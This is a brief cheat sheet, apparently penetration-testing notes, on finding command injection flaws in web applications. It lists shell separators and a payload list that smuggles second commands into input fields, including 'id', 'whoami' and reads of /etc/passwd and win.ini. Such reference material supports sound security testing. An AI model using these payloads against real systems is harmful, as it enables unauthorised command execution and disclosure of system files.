Command injection occurs when flaws in a web application allow the execution of OS commands. This typically occurs because inputs are not properly sanitized, allowing attackers to change or add to executed commands.

• To identify potential command injection vulnerabilities, pay particular attention to functionality within web applications that is normally performed by OS commands

• Use command line symbols in input fields to test for command injection

  • ; (used to separate commands in Bash)

  • |

  • || (second command runs if first fails)

  • &

  • && (second command runs if first succeeds)

  • >

  • >>

• Be sure to use commands specific to the target OS

  • cat vs. type

  • ping vs. ping -c

  • ls vs. dir

Payloads

command; id
command && whoami
command || ls (or dir depending on OS)
command; cat /etc/passwd 
command; type C:\Windows\win.ini
Blind
command; ping -c5 $ipaddress